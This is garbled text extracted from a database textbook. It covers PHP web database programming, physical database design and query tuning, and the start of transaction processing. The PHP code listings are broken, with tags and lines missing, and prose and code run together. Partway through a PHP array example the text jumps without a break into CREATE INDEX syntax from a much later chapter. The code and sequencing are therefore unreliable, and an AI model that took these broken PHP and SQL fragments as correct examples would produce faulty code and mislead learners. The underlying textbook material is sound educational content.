
487

Introduction to SQL Programming Techniques

Section_identifier SemesterCourse_number InstructorYear

SECTION

Course_name Course_number Credit_hours Department

COURSE

Name Student_number Class Major

STUDENT

Course_number Prerequisite_number
PREREQUISITE

Student_number GradeSection_identifier

GRADE_REPORT

Figure A.3
Schema diagram for the
database in Figure A.2.

488

Introduction to SQL Programming Techniques

Publisher_nameBook_id Title

BOOK

BOOK_COPIES
Book_id Branch_id No_of_copies

BOOK_AUTHORS

Book_id Author_name

LIBRARY_BRANCH
Branch_id Branch_name Address

PUBLISHER

Name Address Phone

BOOK_LOANS

Book_id Branch_id Card_no Date_out Due_date

BORROWER
Card_no Name Address Phone

Figure A.4
A relational database
schema for a
LIBRARY database.

489

Web Database
Programming Using PHP

In this chapter, we direct our attention to how data-bases are accessed from scripting languages. Many
electronic commerce (e-commerce) and other Internet applications that provide
Web interfaces to access information stored in one or more databases use scripting
languages. These languages are often used to generate HTML documents, which are
then displayed by the Web browser for interaction with the user.

Basic HTML is useful for generating static Web pages with fixed text and other
objects, but most e-commerce applications require Web pages that provide interac-
tive features with the user. For example, consider the case of an airline customer
who wants to check the arrival time and gate information of a particular flight. The
user may enter information such as a date and flight number in certain form fields
of the Web page. The Web program must first submit a query to the airline database
to retrieve this information, and then display it. Such Web pages, where part of the
information is extracted from databases or other data sources, are called dynamic
Web pages. The data extracted and displayed each time will be for different flights
and dates.

There are various techniques for programming dynamic features into Web pages.
We will focus on one technique here, which is based on using the PHP open source
scripting language. PHP has recently experienced widespread use. The interpreters
for PHP are provided free of charge, and are written in the C language so they are

From Chapter 14 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.

490

Web Database Programming Using PHP

available on most computer platforms. A PHP interpreter provides a Hypertext
Preprocessor, which will execute PHP commands in a text file and create the desired
HTML file. To access databases, a library of PHP functions needs to be included in
the PHP interpreter as we will discuss in Section 3. PHP programs are executed on
the Web server computer. This is in contrast to some scripting languages, such as
JavaScript, that are executed on the client computer.

This chapter is organized as follows. Section 1 gives a simple example to illustrate
how PHP can be used. Section 2 gives a general overview of the PHP language, and
how it is used to program some basic functions for interactive Web pages. Section 3
focuses on using PHP to interact with SQL databases through a library of functions
known as PEAR DB. Finally, Section 4 contains a chapter summary.

1 A Simple PHP Example
PHP is an open source general-purpose scripting language. The interpreter engine
for PHP is written in the C programming language so it can be used on nearly all
types of computers and operating systems. PHP usually comes installed with the
UNIX operating system. For computer platforms with other operating systems such
as Windows, Linux, or Mac OS, the PHP interpreter can be downloaded from:
http://www.php.net. As with other scripting languages, PHP is particularly suited
for manipulation of text pages, and in particular for manipulating dynamic HTML
pages at the Web server computer. This is in contrast to JavaScript, which is down-
loaded with the Web pages to execute on the client computer.

PHP has libraries of functions for accessing databases stored under various types of
relational database systems such as Oracle, MySQL, SQLServer, and any system that
supports the ODBC standard. Under the three-tier architecture, the DBMS would
reside at the bottom-tier database server. PHP would run at the middle-tier Web
server, where the PHP program commands would manipulate the HTML files to
create the customized dynamic Web pages. The HTML is then sent to the client tier
for display and interaction with the user.

Consider the example shown in Figure 1(a), which prompts a user to enter the first
and last name and then prints a welcome message to that user. The line numbers are
not part of the program code; they are used below for explanation purposes only:

1. Suppose that the file containing PHP script in program segment P1 is stored
in the following Internet location: http://www.myserver.com/example/
greeting.php. Then if a user types this address in the browser, the PHP inter-
preter would start interpreting the code and produce the form shown in
Figure 1(b). We will explain how that happens as we go over the lines in code
segment P1.

2. Line 0 shows the PHP start tag , shown on line 16. Text outside of these tags is

491

Enter your name:

SUBMIT NAME SUBMIT NAME

Enter your name:
(b) (c)

(d)

John Smith

Welcome, John Smith

Web Database Programming Using PHP

Figure 1
(a) PHP program segment for entering a greeting,
(b) Initial form displayed by PHP program segment,
(c) User enters name John Smith, (d) Form prints
welcome message for John Smith.

(a)
//Program Segment P1:

0)

10) Enter your name:
11)

12)
13)
14) _HTML_;
15) }
16) ?>

printed as is. This allows PHP code segments to be included within a larger
HTML file. Only the sections in the file between are processed
by the PHP preprocessor.

3. Line 1 shows one way of posting comments in a PHP program on a single
line started by //. Single-line comments can also be started with #, and end
at the end of the line in which they are entered. Multiple line comments start
with /* and end with */.

4. The auto-global predefined PHP variable $_POST (line 2) is an array that
holds all the values entered through form parameters. Arrays in PHP are
dynamic arrays, with no fixed number of elements. They can be numerically
indexed arrays whose indexes (positions) are numbered (0, 1, 2, …), or they

492

Web Database Programming Using PHP

can be associative arrays whose indexes can be any string values. For example,
an associative array indexed based on color can have the indexes {“red”,
“blue”, “green”}. In this example, $_POST is associatively indexed by the name
of the posted value user_name that is specified in the name attribute of the
input tag on line 10. Thus $_POST[‘user_name’] will contain the value
typed in by the user. We will discuss PHP arrays further in Section 2.2.

5. When the Web page at http://www.myserver.com/example/greeting.php is
first opened, the if condition in line 2 will evaluate to false because there is
no value yet in $_POST[‘user_name’]. Hence, the PHP interpreter will
process lines 6 through 15, which create the text for an HTML file that dis-
plays the form shown in Figure 1(b). This is then displayed at the client side
by the Web browser.

6. Line 8 shows one way of creating long text strings in an HTML file. We will
discuss other ways to specify strings later in this section. All text between an
opening <<<_HTML_ and a closing _HTML_; is printed into the HTML file as is. The closing _HTML_; must be alone on a separate line. Thus, the text added to the HTML file sent to the client will be the text between lines 9 and 13. This includes HTML tags to create the form shown in Figure 1(b). 7. PHP variable names start with a $ sign and can include characters, num- bers, and the underscore character _. The PHP auto-global (predefined) variable $_SERVER (line 9) is an array that includes information about the local server. The element $_SERVER['PHP_SELF'] in the array is the path name of the PHP file currently being executed on the server. Thus, the action attribute of the form tag (line 9) instructs the PHP interpreter to reprocess the same file, once the form parameters are entered by the user. 8. Once the user types the name John Smith in the text box and clicks on the SUBMIT NAME button (Figure 1(c)), program segment P1 is reprocessed. This time, $_POST['user_name'] will include the string "John Smith", so lines 3 and 4 will now be placed in the HTML file sent to the client, which displays the message in Figure 1(d). As we can see from this example, the PHP program can create two different HTML commands depending on whether the user just started or whether they had already submitted their name through the form. In general, a PHP program can create numerous variations of HTML text in an HTML file at the server depending on the particular conditional paths taken in the program. Hence, the HTML sent to the client will be different depending on the interaction with the user. This is one way in which PHP is used to create dynamic Web pages. 2 Overview of Basic Features of PHP In this section we give an overview of a few of the features of PHP that are useful in creating interactive HTML pages. Section 3 will focus on how PHP programs can access databases for querying and updating. We cannot give a comprehensive 493 Web Database Programming Using PHP discussion on PHP as there are whole books devoted to this subject. Rather, we focus on illustrating certain features of PHP that are particularly suited for creating dynamic Web pages that contain database access commands. This section covers some PHP concepts and features that will be needed when we discuss database access in Section 3. 2.1 PHP Variables, Data Types, and Programming Constructs PHP variable names start with the $ symbol and can include characters, letters, and the underscore character (_). No other special characters are permitted. Variable names are case sensitive, and the first character cannot be a number. Variables are not typed. The values assigned to the variables determine their type. In fact, the same variable can change its type once a new value is assigned to it. Assignment is via the = operator. Since PHP is directed toward text processing, there are several different types of string values. There are also many functions available for processing strings. We only discuss some basic properties of string values and variables here. Figure 2 illus- trates some string values. There are three main ways to express strings and text: 1. Single-quoted strings. Enclose the string between single quotes, as in lines 0, 1, and 2. If a single quote is needed within the string, use the escape char- acter (\) (see line 2). 2. Double-quoted strings. Enclose strings between double quotes as in line 7. In this case, variable names appearing within the string are replaced by the values that are currently stored in these variables. The interpreter identifies variable names within double-quoted strings by their initial character $ and replaces them with the value in the variable. This is known as interpolating variables within strings. Interpolation does not occur in single-quoted strings. Figure 2 Illustrating basic PHP string and text values. 0) print 'Welcome to my Web site.'; 1) print 'I said to him, "Welcome Home"'; 2) print 'We\'ll now visit the next Web site'; 3) printf('The cost is $%.2f and the tax is $%.2f', $cost, $tax) ; 4) print strtolower('AbCdE'); 5) print ucwords(strtolower('JOHN smith')); 6) print 'abc' . 'efg' 7) print "send your email reply to: $email_address" 8) print <<

10) Enter your name:
11) FORM_HTML

494

Web Database Programming Using PHP

3. Here documents. Enclose a part of a document between a << (greater than), >= (greater than or equal), < (less than), and <= (less than or equal). 2.2 PHP Arrays Arrays are very important in PHP, since they allow lists of elements. They are used frequently in forms that employ pull-down menus. A single-dimensional array is used to hold the list of choices in the pull-down menu. For database query results, two-dimensional arrays are used with the first dimension representing rows of a table and the second dimension representing columns (attributes) within a row. 495 Web Database Programming Using PHP Figure 3 Illustrating basic PHP array processing. 0) $teaching = array('Database' => ‘Smith’, ‘OS’ => ‘Carrick’,
‘Graphics’ => ‘Kam’);

1) $teaching[‘Graphics’] = ‘Benson’; $teaching[‘Data Mining’] = ‘Kam’;
2) sort($teaching);
3) foreach ($teaching as $key => $value) {
4) print ” $key : $value\n”;}
5) $courses = array(‘Database’, ‘OS’, ‘Graphics’, ‘Data Mining’);
6) $alt_row_color = array(‘blue’, ‘yellow’);
7) for ($i = 0, $num = count($courses); i < $num; $i++) { 8) print '

Course $i is$course[$i]
( [ ] { , [ ] } )
[ CLUSTER ] ;

The keywords UNIQUE and CLUSTER are optional. The keyword CLUSTER is used
when the index to be created should also sort the data file records on the indexing
attribute. Thus, specifying CLUSTER on a key (unique) attribute would create some
variation of a primary index, whereas specifying CLUSTER on a nonkey
(nonunique) attribute would create some variation of a clustering index. The value
for can be either ASC (ascending) or DESC (descending), and specifies
whether the data file should be ordered in ascending or descending values of the
indexing attribute. The default is ASC. For example, the following would create a
clustering (ascending) index on the nonkey attribute Dno of the EMPLOYEE file:

CREATE INDEX DnoIndex
ON EMPLOYEE (Dno)
CLUSTER ;

Denormalization as a Design Decision for Speeding Up Queries. The ulti-
mate goal during normalization is to separate attributes into tables to minimize
redundancy, and thereby avoid the update anomalies that lead to an extra process-
ing overhead to maintain consistency in the database. The ideals that are typically
followed are the third or Boyce-Codd normal forms.

The above ideals are sometimes sacrificed in favor of faster execution of frequently
occurring queries and transactions. This process of storing the logical database
design (which may be in BCNF or 4NF) in a weaker normal form, say 2NF or 1NF,
is called denormalization. Typically, the designer includes certain attributes from a
table S into another table R. The reason is that the attributes from S that are
included in R are frequently needed—along with other attributes in R—for answer-
ing queries or producing reports. By including these attributes, a join of R with S is
avoided for these frequently occurring queries and reports. This reintroduces
redundancy in the base tables by including the same attributes in both tables R and
S. A partial functional dependency or a transitive dependency now exists in the table
R, thereby creating the associated redundancy problems. A tradeoff exists between
the additional updating needed for maintaining consistency of redundant attributes

737

Physical Database Design and Tuning

versus the effort needed to perform a join to incorporate the additional attributes
needed in the result. For example, consider the following relation:

ASSIGN (Emp_id, Proj_id, Emp_name, Emp_job_title, Percent_assigned, Proj_name,
Proj_mgr_id, Proj_mgr_name),

which corresponds exactly to the headers in a report called The Employee
Assignment Roster.

This relation is only in 1NF because of the following functional dependencies:

Proj_id → Proj_name, Proj_mgr_id
Proj_mgr_id → Proj_mgr_name
Emp_id → Emp_name, Emp_job_title

This relation may be preferred over the design in 2NF (and 3NF) consisting of the
following three relations:

EMP (Emp_id, Emp_name, Emp_job_title)
PROJ (Proj_id, Proj_name, Proj_mgr_id)
EMP_PROJ (Emp_id, Proj_id, Percent_assigned)

This is because to produce the The Employee Assignment Roster report (with all
fields shown in ASSIGN above), the latter multirelation design requires two
NATURAL JOIN (indicated with *) operations (between EMP and EMP_PROJ, and
between PROJ and EMP_PROJ), plus a final JOIN between PROJ and EMP to retrieve
the Proj_mgr_name from the Proj_mgr_id. Thus the following JOINs would be needed
(the final join would also require renaming (aliasing) of the last EMP table, which is
not shown):

((EMP_PROJ * EMP) * PROJ) PROJ.Proj_mgr_id = EMP.Emp_id EMP

It is also possible to create a view for the ASSIGN table. This does not mean that
the join operations will be avoided, but that the user need not specify the joins. If
the view table is materialized, the joins would be avoided, but if the virtual view
table is not stored as a materialized file, the join computations would still be nec-
essary. Other forms of denormalization consist of storing extra tables to maintain
original functional dependencies that are lost during BCNF decomposition. For
example, Figure A.1 (in Appendix: Figure at the end of this chapter) shows the
TEACH(Student, Course, Instructor) relation with the functional dependencies
{{Student, Course} → Instructor, Instructor → Course}. A lossless decomposition of
TEACH into T1(Student, Instructor) and T2(Instructor, Course) does not allow queries
of the form what course did student Smith take from instructor Navathe to be
answered without joining T1 and T2. Therefore, storing T1, T2, and TEACH may be
a possible solution, which reduces the design from BCNF to 3NF. Here, TEACH is a
materialized join of the other two tables, representing an extreme redundancy. Any
updates to T1 and T2 would have to be applied to TEACH. An alternate strategy is
to create T1 and T2 as updatable base tables, and to create TEACH as a view (virtual
table) on T1 and T2 that can only be queried.

738

Physical Database Design and Tuning

2 An Overview of Database Tuning
in Relational Systems

After a database is deployed and is in operation, actual use of the applications, trans-
actions, queries, and views reveals factors and problem areas that may not have been
accounted for during the initial physical design. The inputs to physical design listed
in Section 1.1 can be revised by gathering actual statistics about usage patterns.
Resource utilization as well as internal DBMS processing—such as query optimiza-
tion—can be monitored to reveal bottlenecks, such as contention for the same data
or devices. Volumes of activity and sizes of data can be better estimated. Therefore, it
is necessary to monitor and revise the physical database design constantly—an activ-
ity referred to as database tuning. The goals of tuning are as follows:

■ To make applications run faster.

■ To improve (lower) the response time of queries and transactions.

■ To improve the overall throughput of transactions.

The dividing line between physical design and tuning is very thin. The same design
decisions that we discussed in Section 1.2 are revisited during database tuning,
which is a continual adjustment of the physical design. We give a brief overview of
the tuning process below.3 The inputs to the tuning process include statistics related
to the same factors mentioned in Section 1.1. In particular, DBMSs can internally
collect the following statistics:

■ Sizes of individual tables.

■ Number of distinct values in a column.

■ The number of times a particular query or transaction is submitted and exe-
cuted in an interval of time.

■ The times required for different phases of query and transaction processing
(for a given set of queries or transactions).

These and other statistics create a profile of the contents and use of the database.
Other information obtained from monitoring the database system activities and
processes includes the following:

■ Storage statistics. Data about allocation of storage into tablespaces, index-
spaces, and buffer pools.

■ I/O and device performance statistics. Total read/write activity (paging) on
disk extents and disk hot spots.

■ Query/transaction processing statistics. Execution times of queries and
transactions, and optimization times during query optimization.

3Interested readers should consult Shasha and Bonnet (2002) for a detailed discussion of tuning.

739

Physical Database Design and Tuning

■ Locking/logging related statistics. Rates of issuing different types of locks,
transaction throughput rates, and log records activity.

■ Index statistics. Number of levels in an index, number of noncontiguous
leaf pages, and so on.

Some of the above statistics relate to transactions, concurrency control, and recov-
ery. Tuning a database involves dealing with the following types of problems:

■ How to avoid excessive lock contention, thereby increasing concurrency
among transactions.

■ How to minimize the overhead of logging and unnecessary dumping of data.

■ How to optimize the buffer size and scheduling of processes.

■ How to allocate resources such as disks, RAM, and processes for most effi-
cient utilization.

Most of the previously mentioned problems can be solved by the DBA by setting
appropriate physical DBMS parameters, changing configurations of devices, chang-
ing operating system parameters, and other similar activities. The solutions tend to
be closely tied to specific systems. The DBAs are typically trained to handle these
tuning problems for the specific DBMS. We briefly discuss the tuning of various
physical database design decisions below.

2.1 Tuning Indexes
The initial choice of indexes may have to be revised for the following reasons:

■ Certain queries may take too long to run for lack of an index.

■ Certain indexes may not get utilized at all.

■ Certain indexes may undergo too much updating because the index is on an
attribute that undergoes frequent changes.

Most DBMSs have a command or trace facility, which can be used by the DBA to ask
the system to show how a query was executed—what operations were performed in
what order and what secondary access structures (indexes) were used. By analyzing
these execution plans, it is possible to diagnose the causes of the above problems.
Some indexes may be dropped and some new indexes may be created based on the
tuning analysis.

The goal of tuning is to dynamically evaluate the requirements, which sometimes
fluctuate seasonally or during different times of the month or week, and to reorgan-
ize the indexes and file organizations to yield the best overall performance.
Dropping and building new indexes is an overhead that can be justified in terms of
performance improvements. Updating of a table is generally suspended while an

740

Physical Database Design and Tuning

index is dropped or created; this loss of service must be accounted for. Besides drop-
ping or creating indexes and changing from a nonclustered to a clustered index and
vice versa, rebuilding the index may improve performance. Most RDBMSs use
B+-trees for an index. If there are many deletions on the index key, index pages may
contain wasted space, which can be claimed during a rebuild operation. Similarly,
too many insertions may cause overflows in a clustered index that affect perfor-
mance. Rebuilding a clustered index amounts to reorganizing the entire table
ordered on that key.

The available options for indexing and the way they are defined, created, and reor-
ganized varies from system to system. As an illustration, consider the sparse and
dense indexes. A sparse index such as a primary index will have one index pointer for
each page (disk block) in the data file; a dense index such as a unique secondary
index will have an index pointer for each record. Sybase provides clustering indexes
as sparse indexes in the form of B+-trees, whereas INGRES provides sparse clustering
indexes as ISAM files and dense clustering indexes as B+-trees. In some versions of
Oracle and DB2, the option of setting up a clustering index is limited to a dense
index (with many more index entries), and the DBA has to work with this limitation.

2.2 Tuning the Database Design
In Section 1.2, we discussed the need for a possible denormalization, which is a
departure from keeping all tables as BCNF relations. If a given physical database
design does not meet the expected objectives, the DBA may revert to the logical
database design, make adjustments such as denormalizations to the logical schema,
and remap it to a new set of physical tables and indexes.

As discussed, the entire database design has to be driven by the processing require-
ments as much as by data requirements. If the processing requirements are dynam-
ically changing, the design needs to respond by making changes to the conceptual
schema if necessary and to reflect those changes into the logical schema and physi-
cal design. These changes may be of the following nature:

■ Existing tables may be joined (denormalized) because certain attributes
from two or more tables are frequently needed together: This reduces the
normalization level from BCNF to 3NF, 2NF, or 1NF.4

■ For the given set of tables, there may be alternative design choices, all of
which achieve 3NF or BCNF. One normalized design may be replaced by
another.

■ A relation of the form R(K,A, B, C, D, …)—with K as a set of key attributes—
that is in BCNF can be stored in multiple tables that are also in BCNF—for
example, R1(K, A, B), R2(K, C, D, ), R3(K, …)—by replicating the key K in each
table. Such a process is known as vertical partitioning. Each table groups

4Note that 3NF and 2NF address different types of problem dependencies that are independent of each
other; hence, the normalization (or denormalization) order between them is arbitrary.

741

Physical Database Design and Tuning

sets of attributes that are accessed together. For example, the table
EMPLOYEE(Ssn, Name, Phone, Grade, Salary) may be split into two tables:
EMP1(Ssn, Name, Phone) and EMP2(Ssn, Grade, Salary). If the original table
has a large number of rows (say 100,000) and queries about phone numbers
and salary information are totally distinct and occur with very different fre-
quencies, then this separation of tables may work better.

■ Attribute(s) from one table may be repeated in another even though this cre-
ates redundancy and a potential anomaly. For example, Part_name may be
replicated in tables wherever the Part# appears (as foreign key), but there
may be one master table called PART_MASTER(Part#, Part_name, …) where
the Partname is guaranteed to be up-to-date.

■ Just as vertical partitioning splits a table vertically into multiple tables,
horizontal partitioning takes horizontal slices of a table and stores them as
distinct tables. For example, product sales data may be separated into ten
tables based on ten product lines. Each table has the same set of columns
(attributes) but contains a distinct set of products (tuples). If a query or
transaction applies to all product data, it may have to run against all the
tables and the results may have to be combined.

These types of adjustments designed to meet the high volume of queries or transac-
tions, with or without sacrificing the normal forms, are commonplace in practice.

2.3 Tuning Queries
We already discussed how query performance is dependent upon the appropriate
selection of indexes, and how indexes may have to be tuned after analyzing queries
that give poor performance by using the commands in the RDBMS that show the
execution plan of the query. There are mainly two indications that suggest that
query tuning may be needed:

1. A query issues too many disk accesses (for example, an exact match query
scans an entire table).

2. The query plan shows that relevant indexes are not being used.

Some typical instances of situations prompting query tuning include the following:

1. Many query optimizers do not use indexes in the presence of arithmetic
expressions (such as Salary/365 > 10.50), numerical comparisons of attrib-
utes of different sizes and precision (such as Aqty = Bqty where Aqty is of type
INTEGER and Bqty is of type SMALLINTEGER), NULL comparisons (such as
Bdate IS NULL), and substring comparisons (such as Lname LIKE ‘%mann’).

2. Indexes are often not used for nested queries using IN; for example, the fol-
lowing query:

SELECT Ssn FROM EMPLOYEE
WHERE Dno IN ( SELECT Dnumber FROM DEPARTMENT

WHERE Mgr_ssn = ‘333445555’ );

742

Physical Database Design and Tuning

may not use the index on Dno in EMPLOYEE, whereas using Dno = Dnumber
in the WHERE-clause with a single block query may cause the index to be
used.

3. Some DISTINCTs may be redundant and can be avoided without changing
the result. A DISTINCT often causes a sort operation and must be avoided as
much as possible.

4. Unnecessary use of temporary result tables can be avoided by collapsing
multiple queries into a single query unless the temporary relation is needed
for some intermediate processing.

5. In some situations involving the use of correlated queries, temporaries are
useful. Consider the following query, which retrieves the highest paid
employee in each department:

SELECT Ssn
FROM EMPLOYEE E
WHERE Salary = SELECT MAX (Salary)

FROM EMPLOYEE AS M
WHERE M.Dno = E.Dno;

This has the potential danger of searching all of the inner EMPLOYEE table M
for each tuple from the outer EMPLOYEE table E. To make the execution
more efficient, the process can be broken into two queries, where the first
query just computes the maximum salary in each department as follows:

SELECT MAX (Salary) AS High_salary, Dno INTO TEMP
FROM EMPLOYEE
GROUP BY Dno;
SELECT EMPLOYEE.Ssn
FROM EMPLOYEE, TEMP
WHERE EMPLOYEE.Salary = TEMP.High_salary

AND EMPLOYEE.Dno = TEMP.Dno;

6. If multiple options for a join condition are possible, choose one that uses a
clustering index and avoid those that contain string comparisons. For exam-
ple, assuming that the Name attribute is a candidate key in EMPLOYEE and
STUDENT, it is better to use EMPLOYEE.Ssn = STUDENT.Ssn as a join condi-
tion rather than EMPLOYEE.Name = STUDENT.Name if Ssn has a clustering
index in one or both tables.

7. One idiosyncrasy with some query optimizers is that the order of tables in
the FROM-clause may affect the join processing. If that is the case, one may
have to switch this order so that the smaller of the two relations is scanned
and the larger relation is used with an appropriate index.

8. Some query optimizers perform worse on nested queries compared to their
equivalent unnested counterparts. There are four types of nested queries:

■ Uncorrelated subqueries with aggregates in an inner query.

■ Uncorrelated subqueries without aggregates.

■ Correlated subqueries with aggregates in an inner query.

743

Physical Database Design and Tuning

■ Correlated subqueries without aggregates.

Of the four types above, the first one typically presents no problem, since
most query optimizers evaluate the inner query once. However, for a query
of the second type, such as the example in item 2, most query optimizers
may not use an index on Dno in EMPLOYEE. However, the same optimizers
may do so if the query is written as an unnested query. Transformation of
correlated subqueries may involve setting temporary tables. Detailed exam-
ples are outside our scope here.5

9. Finally, many applications are based on views that define the data of interest
to those applications. Sometimes, these views become overkill, because a
query may be posed directly against a base table, rather than going through a
view that is defined by a JOIN.

2.4 Additional Query Tuning Guidelines
Additional techniques for improving queries apply in certain situations as follows:

1. A query with multiple selection conditions that are connected via OR may
not be prompting the query optimizer to use any index. Such a query may be
split up and expressed as a union of queries, each with a condition on an
attribute that causes an index to be used. For example,

SELECT Fname, Lname, Salary, Age6

FROM EMPLOYEE
WHERE Age > 45 OR Salary < 50000; may be executed using sequential scan giving poor performance. Splitting it up as SELECT Fname, Lname, Salary, Age FROM EMPLOYEE WHERE Age > 45
UNION
SELECT Fname, Lname, Salary, Age
FROM EMPLOYEE
WHERE Salary < 50000; may utilize indexes on Age as well as on Salary. 2. To help expedite a query, the following transformations may be tried: ■ NOT condition may be transformed into a positive expression. ■ Embedded SELECT blocks using IN, = ALL, = ANY, and = SOME may be replaced by joins. ■ If an equality join is set up between two tables, the range predicate (selec- tion condition) on the joining attribute set up in one table may be repeated for the other table. 5For further details, see Shasha and Bonnet (2002). 6We modified the schema and used Age in EMPLOYEE instead of Bdate. 744 Physical Database Design and Tuning 3. WHERE conditions may be rewritten to utilize the indexes on multiple columns. For example, SELECT Region#, Prod_type, Month, Sales FROM SALES_STATISTICS WHERE Region# = 3 AND ((Prod_type BETWEEN 1 AND 3) OR (Prod_type BETWEEN 8 AND 10)); may use an index only on Region# and search through all leaf pages of the index for a match on Prod_type. Instead, using SELECT Region#, Prod_type, Month, Sales FROM SALES_STATISTICS WHERE (Region# = 3 AND (Prod_type BETWEEN 1 AND 3)) OR (Region# = 3 AND (Prod_type BETWEEN 8 AND 10)); may use a composite index on (Region#, Prod_type) and work much more efficiently. In this section, we have covered many of the common instances where the ineffi- ciency of a query may be fixed by some simple corrective action such as using a tem- porary table, avoiding certain types of query constructs, or avoiding the use of views. The goal is to have the RDBMS use existing single attribute or composite attribute indexes as much as possible. This avoids full scans of data blocks or entire scanning of index leaf nodes. Redundant processes like sorting must be avoided at any cost. The problems and the remedies will depend upon the workings of a query optimizer within an RDBMS. Detailed literature exists in database tuning guidelines for database administration by the RDBMS vendors. Major relational DBMS ven- dors like Oracle, IBM and Microsoft encourage their large customers to share ideas of tuning at the annual expos and other forums so that the entire industry benefits by using performance enhancement techniques. These techniques are typically available in trade literature and on various Web sites. 3 Summary In this chapter, we discussed the factors that affect physical database design deci- sions and provided guidelines for choosing among physical design alternatives. We discussed changes to logical design such as denormalization, as well as modifica- tions of indexes, and changes to queries to illustrate different techniques for data- base performance tuning. These are only a representative sample of a large number of measures and techniques adopted in the design of large commercial applications of relational DBMSs. Review Questions 1. What are the important factors that influence physical database design? 2. Discuss the decisions made during physical database design. 3. Discuss the guidelines for physical database design in RDBMSs. 745 Physical Database Design and Tuning 4. Discuss the types of modifications that may be applied to the logical data- base design of a relational database. 5. Under what situations would denormalization of a database schema be used? Give examples of denormalization. 6. Discuss the tuning of indexes for relational databases. 7. Discuss the considerations for reevaluating and modifying SQL queries. 8. Illustrate the types of changes to SQL queries that may be worth considering for improving the performance during database tuning. Selected Bibliography Wiederhold (1987) covers issues related to physical design. O’Neil and O’Neil (2001) has a detailed discussion of physical design and transaction issues in refer- ence to commercial RDBMSs. Navathe and Kerschberg (1986) discuss all phases of database design and point out the role of data dictionaries. Rozen and Shasha (1991) and Carlis and March (1984) present different models for the problem of physical database design. Shasha and Bonnet (2002) has an elaborate discussion of guidelines for database tuning. Niemiec (2008) is one among several books available for Oracle database administration and tuning; Schneider (2006) is focused on designing and tuning MySQL databases. TEACH Student Narayan Smith Smith Smith Mark Navathe Ammar Schulman Operating Systems Database Database Theory Wallace Wallace Wong Zelaya Mark Ahamad Omiecinski Navathe Database Database Operating Systems Database Course Instructor Narayan Operating Systems Ammar Figure A.1 A relation TEACH that is in 3NF but not BCNF. 746 Introduction to Transaction Processing Concepts and Theory The concept of transaction provides a mechanismfor describing logical units of database processing. Transaction processing systems are systems with large databases and hundreds of concurrent users executing database transactions. Examples of such systems include airline reservations, banking, credit card processing, online retail purchasing, stock markets, supermarket checkouts, and many other applications. These systems require high availability and fast response time for hundreds of concurrent users. In this chapter we present the concepts that are needed in transaction processing sys- tems. We define the concept of a transaction, which is used to represent a logical unit of database processing that must be completed in its entirety to ensure correct- ness. A transaction is typically implemented by a computer program, which includes database commands such as retrievals, insertions, deletions, and updates. In this chapter, we focus on the basic concepts and theory that are needed to ensure the correct executions of transactions. We discuss the concurrency control problem, which occurs when multiple transactions submitted by various users interfere with one another in a way that produces incorrect results. We also discuss the problems that can occur when transactions fail, and how the database system can recover from various types of failures. This chapter is organized as follows. Section 1 informally discusses why concur- rency control and recovery are necessary in a database system. Section 2 defines the term transaction and discusses additional concepts related to transaction processing in database systems. Section 3 presents the important properties of atomicity, con- sistency preservation, isolation, and durability or permanency—called the ACID From Chapter 21 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison- Wesley. All rights reserved. 747 Introduction to Transaction Processing Concepts and Theory properties—that are considered desirable in transaction processing systems. Section 4 introduces the concept of schedules (or histories) of executing transactions and characterizes the recoverability of schedules. Section 5 discusses the notion of serializability of concurrent transaction execution, which can be used to define cor- rect execution sequences (or schedules) of concurrent transactions. In Section 6, we present some of the commands that support the transaction concept in SQL. Section 7 summarizes the chapter. 1 Introduction to Transaction Processing In this section we discuss the concepts of concurrent execution of transactions and recovery from transaction failures. Section 1.1 compares single-user and multiuser database systems and demonstrates how concurrent execution of transactions can take place in multiuser systems. Section 1.2 defines the concept of transaction and presents a simple model of transaction execution based on read and write database operations. This model is used as the basis for defining and formalizing concur- rency control and recovery concepts. Section 1.3 uses informal examples to show why concurrency control techniques are needed in multiuser systems. Finally, Section 1.4 discusses why techniques are needed to handle recovery from system and transaction failures by discussing the different ways in which transactions can fail while executing. 1.1 Single-User versus Multiuser Systems One criterion for classifying a database system is according to the number of users who can use the system concurrently. A DBMS is single-user if at most one user at a time can use the system, and it is multiuser if many users can use the system—and hence access the database—concurrently. Single-user DBMSs are mostly restricted to personal computer systems; most other DBMSs are multiuser. For example, an airline reservations system is used by hundreds of travel agents and reservation clerks concurrently. Database systems used in banks, insurance agencies, stock exchanges, supermarkets, and many other applications are multiuser systems. In these systems, hundreds or thousands of users are typically operating on the data- base by submitting transactions concurrently to the system. Multiple users can access databases—and use computer systems—simultaneously because of the concept of multiprogramming, which allows the operating system of the computer to execute multiple programs—or processes—at the same time. A single central processing unit (CPU) can only execute at most one process at a time. However, multiprogramming operating systems execute some commands from one process, then suspend that process and execute some commands from the next 748 Introduction to Transaction Processing Concepts and Theory A A B B C D CPU1 CPU2 t1 t2 t3 t4 Time Figure 1 Interleaved process- ing versus parallel processing of con- current transactions. process, and so on. A process is resumed at the point where it was suspended when- ever it gets its turn to use the CPU again. Hence, concurrent execution of processes is actually interleaved, as illustrated in Figure 1, which shows two processes, A and B, executing concurrently in an interleaved fashion. Interleaving keeps the CPU busy when a process requires an input or output (I/O) operation, such as reading a block from disk. The CPU is switched to execute another process rather than remaining idle during I/O time. Interleaving also prevents a long process from delaying other processes. If the computer system has multiple hardware processors (CPUs), parallel process- ing of multiple processes is possible, as illustrated by processes C and D in Figure 1. Most of the theory concerning concurrency control in databases is developed in terms of interleaved concurrency, so for the remainder of this chapter we assume this model. In a multiuser DBMS, the stored data items are the primary resources that may be accessed concurrently by interactive users or application programs, which are constantly retrieving information from and modifying the database. 1.2 Transactions, Database Items, Read and Write Operations, and DBMS Buffers A transaction is an executing program that forms a logical unit of database process- ing. A transaction includes one or more database access operations—these can include insertion, deletion, modification, or retrieval operations. The database operations that form a transaction can either be embedded within an application program or they can be specified interactively via a high-level query language such as SQL. One way of specifying the transaction boundaries is by specifying explicit begin transaction and end transaction statements in an application program; in this case, all database access operations between the two are considered as forming one transaction. A single application program may contain more than one transac- tion if it contains several transaction boundaries. If the database operations in a transaction do not update the database but only retrieve data, the transaction is called a read-only transaction; otherwise it is known as a read-write transaction. 749 Introduction to Transaction Processing Concepts and Theory The database model that is used to present transaction processing concepts is quite simple when compared to data models, such as the relational model or the object model. A database is basically represented as a collection of named data items. The size of a data item is called its granularity. A data item can be a database record, but it can also be a larger 